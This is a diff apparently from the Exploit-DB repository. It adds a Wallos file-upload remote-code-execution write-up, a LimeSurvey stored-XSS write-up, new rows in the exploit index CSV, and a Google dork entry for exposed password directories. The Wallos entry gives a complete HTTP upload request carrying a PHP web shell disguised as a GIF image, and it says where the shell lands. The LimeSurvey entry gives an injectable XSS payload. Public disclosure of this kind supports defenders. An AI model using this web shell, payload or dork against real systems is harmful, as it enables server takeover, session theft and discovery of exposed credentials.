 # Date: 2024-03-04
 # Exploit Author: sml@lacashita.com
 # Vendor Homepage: https://github.com/ellite/Wallos
 # Software Link: https://github.com/ellite/Wallos
 # Version: < 1.11.2
 # Tested on: Debian 12
 Wallos allows you to upload an image/logo when you create a new subscription.
 This can be bypassed to upload a malicious .php file.
 POC
 ---
 1) Log into the application.
 2) Go to "New Subscription"
 3) Upload Logo and choose your webshell .php
 4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:
 --- SNIP -----------------
 POST /endpoints/subscription/add.php HTTP/1.1
 Host: 192.168.1.44
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://192.168.1.44/
 Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324
 Origin: http://192.168.1.44
 Content-Length: 7220
 Connection: close
 Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light
 -----------------------------29251442139477260933920738324
 Content-Disposition: form-data; name="name"
 test
 -----------------------------29251442139477260933920738324
 Content-Disposition: form-data; name="logo"; filename="revshell.php"
 Content-Type: image/jpeg
 GIF89a;
 <?php
 system($_GET['cmd']);
 ?>
 -----------------------------29251442139477260933920738324
 Content-Disposition: form-data; name="logo-url"
 ----- SNIP -----
 5) You will get the response that your file was uploaded ok:
 {"status":"Success","message":"Subscription updated successfully"}
 6) Your file will be located in:
 http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php
--- a/exploits/php/webapps/51926.txt
+++ b/exploits/php/webapps/51926.txt
@ -0,0 +1,56 @@
 # Exploit Title: Stored Cross-Site Scripting (XSS) in LimeSurvey Community
 Edition Version 5.3.32+220817
 # Exploit Author: Subhankar Singh
 # Date: 2024-02-03
 # Vendor: LimeSurvey
 # Software Link: https://community.limesurvey.org/releases/
 # Version: LimeSurvey Community Edition Version 5.3.32+220817
 # Tested on: Windows (Client)
 # CVE: CVE-2024-24506
 ## Description:
 A critical security vulnerability exists in LimeSurvey Community Edition
 Version 5.3.32+220817, particularly in the "General Setting"
 functionality's "Administrator email address:" field. This allows an
 attacker to compromise the super-admin account, leading to potential theft
 of cookies and session tokens.
 ## Background:
 Cross-site scripting (XSS) is a common web security vulnerability that
 compromises user interactions with a vulnerable application. Stored XSS
 occurs when user input is stored in the application and executed whenever a
 user triggers or visits the page.
 ## Issue:
 LimeSurvey fails to properly validate user-supplied input on both client
 and server sides, despite some protective measures. The "Administrator
 email address:" field within the "General Setting" functionality permits
 the insertion of special characters, enabling the injection of malicious
 JavaScript payloads. These payloads are stored in the database and executed
 when the user saves or reloads the page.
 ## Steps To Reproduce:
 1. Log into the LimeSurvey application.
 2. Navigate to the general settings.
 3. Insert the following JavaScript payload in the "Administrator email
 address:" field:
 Payload: `abcxyz@gmail.com"><u>s</u><svg
 onload=confirm(document.domain)>`
 ## Expected Result:
 The LimeSurvey application should display an alert with the domain after
 clicking save and reloading the page.
 ## Actual Result:
 The LimeSurvey application is vulnerable to Stored Cross-Site Scripting, as
 evidenced by the successful execution of the injected payload.
 ## Proof of Concept:
 Attached Screenshots for the reference.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -8314,6 +8314,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31591,exploits/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal",2008-04-02,"Luigi Auriemma",remote,linux,,2008-04-02,2014-02-17,1,CVE-2008-6195;OSVDB-54671,,,,,https://www.securityfocus.com/bid/28577/info
 24622,exploits/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow",2004-09-21,"D. J. Bernstein",remote,linux,,2004-09-21,2017-11-15,1,CVE-2004-2167;OSVDB-10216,,,,,https://www.securityfocus.com/bid/11233/info
 22830,exploits/linux/remote/22830.c,"LBreakout2 2.x - Login Remote Format String",2003-06-24,V9,remote,linux,,2003-06-24,2017-04-13,1,,,,,,https://www.securityfocus.com/bid/8021/info
 51922,exploits/linux/remote/51922.c,"LBT-T300-mini1 - Remote Buffer Overflow",2024-03-25,"Amirhossein Bahramizadeh",remote,linux,,2024-03-25,2024-03-25,0,,,,,,
 19868,exploits/linux/remote/19868.c,"LCDProc 0.4 - Remote Buffer Overflow",2000-04-23,"Andrew Hobgood",remote,linux,,2000-04-23,2012-07-16,1,CVE-2000-0295;OSVDB-13654,,,,,https://www.securityfocus.com/bid/1131/info
 23936,exploits/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x - Multiple Vulnerabilities",2004-04-08,wsxz,remote,linux,,2004-04-08,2013-01-06,1,CVE-2004-1915;OSVDB-5158,,,,,https://www.securityfocus.com/bid/10085/info
 143,exploits/linux/remote/143.c,"lftp 2.6.9 - Remote Stack Overflow",2004-01-14,Li0n7,remote,linux,,2004-01-13,2016-03-07,1,OSVDB-3015;CVE-2003-0963,,,,http://www.exploit-db.comlftp-2.6.9.tar.bz2,
@ -12057,6 +12058,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,,
 48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
 51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
 41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
 41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
 41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Request Forgery (CSRF)",,,,
@ -16465,6 +16467,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,,2019-09-02,2019-09-02,0,CVE-2019-14280,,,,,
 46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-20418,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCraft-3.0.25.rar,
 46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80,2019-03-04,2019-03-04,0,CVE-2019-9554,"Cross-Site Scripting (XSS)",,,,
 51918,exploits/php/webapps/51918.py,"Craft CMS 4.4.14 - Unauthenticated Remote Code Execution",2024-03-25,"Olivier Lasne",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,,2020-05-20,2020-05-20,0,,,,,,
 1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php,,2006-04-03,,1,OSVDB-24387;CVE-2006-1668;OSVDB-24386;CVE-2006-1667,,,,,
 6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php,,2008-08-24,2018-01-05,1,OSVDB-47782;CVE-2008-3845;OSVDB-47781;GTSA-00119,,,,,http://gulftech.org/advisories/Crafty%20Syntax%20Live%20Help%20SQL%20Injection/119
@ -20124,6 +20127,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 26685,exploits/php/webapps/26685.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' SQL Injection",2005-11-30,r0t,webapps,php,,2005-11-30,2013-07-08,1,CVE-2005-3986;OSVDB-21334,,,,,https://www.securityfocus.com/bid/15659/info
 27739,exploits/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - 'portfolio_photo_popup.php?id' Cross-Site Scripting",2006-04-25,Qex,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2052;OSVDB-24986,,,,,https://www.securityfocus.com/bid/17696/info
 30398,exploits/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",webapps,php,80,2013-12-17,2013-12-17,0,CVE-2013-6839;OSVDB-100025,,,,,https://www.htbridge.com/advisory/HTB23185
 51920,exploits/php/webapps/51920.txt,"Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS",2024-03-25,"Hakkı TOKLU",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
 6390,exploits/php/webapps/6390.txt,"Integramod 1.4.x - Insecure Directory Download Database",2008-09-06,TheJT,webapps,php,,2008-09-05,,1,OSVDB-48026;CVE-2008-4183,,,,,
 4463,exploits/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",webapps,php,,2007-09-26,2016-10-19,1,OSVDB-37370;CVE-2007-5140,,,,http://www.exploit-db.comIntegraMOD142_nl.tar.gz,
 2256,exploits/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,webapps,php,,2006-08-24,2016-12-21,1,,,,,,
@ -22608,6 +22612,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48762,exploits/php/webapps/48762.txt,"LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting",2020-08-24,"Matthew Aberegg",webapps,php,,2020-08-24,2020-08-24,0,,,,,,
 50573,exploits/php/webapps/50573.py,"LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)",2021-12-09,Y1LD1R1M,webapps,php,,2021-12-09,2021-12-09,0,,,,,,
 46634,exploits/php/webapps/46634.py,"LimeSurvey < 3.16 - Remote Code Execution",2019-04-02,q3rv0,webapps,php,,2019-04-02,2019-04-02,0,CVE-2018-17057,,,,,
 51926,exploits/php/webapps/51926.txt,"LimeSurvey Community 5.3.32 - Stored XSS",2024-03-25,"Subhankar Singh",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
 37554,exploits/php/webapps/37554.txt,"Limny - 'index.php' Multiple SQL Injections",2012-07-31,L0n3ly-H34rT,webapps,php,,2012-07-31,2015-07-10,1,,,,,,https://www.securityfocus.com/bid/54753/info
 11377,exploits/php/webapps/11377.txt,"Limny 1.01 - Arbitrary File Upload",2010-02-09,JIKO,webapps,php,,2010-02-08,,1,OSVDB-62262,,,,http://www.exploit-db.comlimny-1.01.zip,
 9281,exploits/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,webapps,php,,2009-07-26,,1,OSVDB-56592;CVE-2009-4722,,,,,
@ -23615,6 +23620,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9327,exploits/php/webapps/9327.txt,"Mobilelib Gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,webapps,php,,2009-07-31,,1,OSVDB-57166;CVE-2009-2788;OSVDB-57165;OSVDB-57164,,,,,
 9144,exploits/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,webapps,php,,2009-07-13,,1,OSVDB-59373;CVE-2009-3823,,,,,
 2383,exploits/php/webapps/2383.txt,"MobilePublisherPHP 1.5 RC2 - Remote File Inclusion",2006-09-17,Timq,webapps,php,,2006-09-16,,1,OSVDB-28920;CVE-2006-4849,,,,,
 51921,exploits/php/webapps/51921.txt,"MobileShop master v1.0 - SQL Injection Vuln.",2024-03-25,"HAZIM ARBAŞ",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
 6138,exploits/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,webapps,php,,2008-07-25,2016-12-14,1,OSVDB-47221;CVE-2008-3420;OSVDB-47220,,,,,
 11321,exploits/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-01,,1,,,,,,
 11019,exploits/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",webapps,php,,2010-01-05,,0,,,,,,
@ -30170,6 +30176,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7946,exploits/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,webapps,php,,2009-02-01,,1,OSVDB-51822;CVE-2009-0456,,,,,
 45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip,
 11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,,
 51919,exploits/php/webapps/51919.txt,"SPA-CART CMS - Stored XSS",2024-03-25,"Eren Sen",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
 51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,,
 51714,exploits/php/webapps/51714.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection",2023-09-08,CraCkEr,webapps,php,,2023-09-08,2023-09-08,0,CVE-2023-4548,,,,,
 12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,,
@ -31095,6 +31102,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36074,exploits/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",webapps,php,,2011-08-22,2015-02-14,1,,,,,,https://www.securityfocus.com/bid/49263/info
 41733,exploits/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php,,2017-03-26,2017-03-27,0,,,,,,
 48892,exploits/php/webapps/48892.txt,"Tourism Management System 1.0 - Arbitrary File Upload",2020-10-19,"Ankita Pal",webapps,php,,2020-10-19,2020-10-19,0,,,,,,
 51923,exploits/php/webapps/51923.txt,"Tourism Management System v2.0 - Arbitrary File Upload",2024-03-25,SoSPiro,webapps,php,,2024-03-25,2024-03-25,0,,,,,,
 45962,exploits/php/webapps/45962.txt,"Tourism Website Blog - Remote Code Execution / SQL Injection",2018-12-11,"Ihsan Sencan",webapps,php,80,2018-12-11,2018-12-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comfon_0.zip,
 36080,exploits/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49297/info
 34599,exploits/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Multiple SQL Injections",2009-09-10,Mr.SQL,webapps,php,,2009-09-10,2014-09-09,1,,,,,,https://www.securityfocus.com/bid/42975/info
@ -32104,6 +32112,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12562,exploits/php/webapps/12562.txt,"Waibrasil - Local/Remote File Inclusion",2010-05-10,eXeSoul,webapps,php,,2010-05-09,,1,,,,,,
 47548,exploits/php/webapps/47548.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting",2019-10-28,cakes,webapps,php,,2019-10-28,2019-10-28,0,,,,,,
 47546,exploits/php/webapps/47546.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection",2019-10-28,cakes,webapps,php,,2019-10-28,2019-10-28,0,,,,,,
 51924,exploits/php/webapps/51924.txt,"Wallos < 1.11.2 - File Upload RCE",2024-03-25,sml,webapps,php,,2024-03-25,2024-03-25,0,,,,,,
 2835,exploits/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - SQL Injection",2006-11-23,GregStar,webapps,php,,2006-11-22,,1,OSVDB-30680;CVE-2006-6214,,,,,
 30356,exploits/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Persistent Cross-Site Scripting",2013-12-16,"null pointer",webapps,php,,2013-12-20,2013-12-20,0,CVE-2013-7274;OSVDB-101359,,,,,
 4770,exploits/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - 'category.php' SQL Injection",2007-12-22,Koller,webapps,php,,2007-12-21,,1,OSVDB-40369;CVE-2007-6580;OSVDB-40368,,,,,
--- a/ghdb.xml
+++ b/ghdb.xml
@ -97354,6 +97354,21 @@ Devender Mahto
  <date>2016-01-06</date>
  <author>anonymous</author>
 </entry>
 <entry>
  <id>8424</id>
  <link>https://www.exploit-db.com/ghdb/8424</link>
  <category>Sensitive Directories</category>
  <shortDescription>intitle: index of /concrete/Password</shortDescription>
  <textualDescription>Description-* intitle: index of /concrete/Password*
 This google dork searches in the title of websites for the  index of
 /concrete/Password
 </textualDescription>
  <query>intitle: index of /concrete/Password</query>
  <querystring>https://www.google.com/search?q=intitle: index of /concrete/Password</querystring>
  <edb></edb>
  <date>2024-03-25</date>
  <author>Gautam Rawat</author>
 </entry>
 <entry>
  <id>5011</id>
  <link>https://www.exploit-db.com/ghdb/5011</link>